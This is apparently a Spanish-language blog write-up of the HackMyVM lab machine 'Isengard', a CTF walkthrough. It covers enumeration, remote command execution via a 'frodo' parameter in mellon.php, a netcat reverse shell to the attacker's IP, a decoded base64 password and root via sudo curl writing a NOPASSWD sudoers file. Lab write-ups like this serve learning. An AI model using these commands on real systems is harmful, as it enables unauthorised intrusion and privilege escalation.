cd ~/blog

~/writeups/hmv/070-isengard.md

070 - Isengard

easy Linux hmv 15-04-2024
Web parameter RCE (mellon.php)Nested directory + base64 passwordsudo curl file write (sudoers.d)
hackmyvm.eu/machines/machine.php?vm=Isengard

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.137
 nmap -sCV -p80 -oN 02-targeted.txt 192.168.1.137
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-15 20:41 -04
Nmap scan report for 192.168.1.137
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Gray wizard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds

El sitio muestra un mensaje en tengwar. Al final de main.css hay una pista:

/* btw: in the robots.txt i have to put the url /y0ush4lln0tp4ss */

Enumeramos ese subdirectorio:

 gobuster dir -u 'http://192.168.1.137/y0ush4lln0tp4ss' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/1.jpeg               (Status: 200) [Size: 88602]
/2.jpg                (Status: 200) [Size: 63526]
/3.jpg                (Status: 200) [Size: 136974]
/east                 (Status: 200) [Size: 285]

En /east hay otra pista y un mellon.php:

 curl http://192.168.1.137/y0ush4lln0tp4ss/east/
...
<!--
file to be added -> ring.zip
  -->
...
 gobuster dir -u 'http://192.168.1.137/y0ush4lln0tp4ss/east' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/mellon.php           (Status: 200) [Size: 0]
...

Fuzzeamos el parámetro de mellon.php y damos con frodo, que ejecuta comandos:

 ffuf -u 'http://192.168.1.137/y0ush4lln0tp4ss/east/mellon.php?FUZZ=ls' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/big.txt -fs 0
...
frodo                   [Status: 200, Size: 77, Words: 1, Lines: 7, Duration: 97ms]
...

Lanzamos una reverse shell:

http://192.168.1.137/y0ush4lln0tp4ss/east/mellon.php?frodo=nc%20-e%20/bin/bash%20192.168.1.3%201234

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
whoami
www-data

En un directorio muy anidado de /opt hay un ZIP con un ring.txt codificado en base64 doble:

 cat ring.txt
ZVZoTFRYYzFkM0JUUVhKTU1rTk1XQW89Cg==
 cat ring.txt | base64 -d | base64 -d
yXKMw5wpSArL2CLX

Cambiamos al usuario sauron con esa contraseña y obtenemos la primera flag:

www-data@isengard:/home$ su sauron
Password: yXKMw5wpSArL2CLX
sauron@isengard:/home$

Revisamos sudo -l:

sauron@isengard:/tmp$ sudo -l
Matching Defaults entries for sauron on isengard:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sauron may run the following commands on isengard:
    (ALL) /usr/bin/curl

Podemos ejecutar curl como root, que permite escribir archivos. Creamos un fichero sudoers y lo colocamos en /etc/sudoers.d/:

sauron@isengard:/tmp$ echo 'sauron ALL=(ALL) NOPASSWD: ALL' > sudouser

sauron@isengard:/tmp$ sudo curl file:///tmp/sudouser -o /etc/sudoers.d/sauron

sauron@isengard:/tmp$ sudo -l
...
User sauron may run the following commands on isengard:
    (ALL) /usr/bin/curl
    (ALL) NOPASSWD: ALL

sauron@isengard:/tmp$ sudo bash
root@isengard:/tmp#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados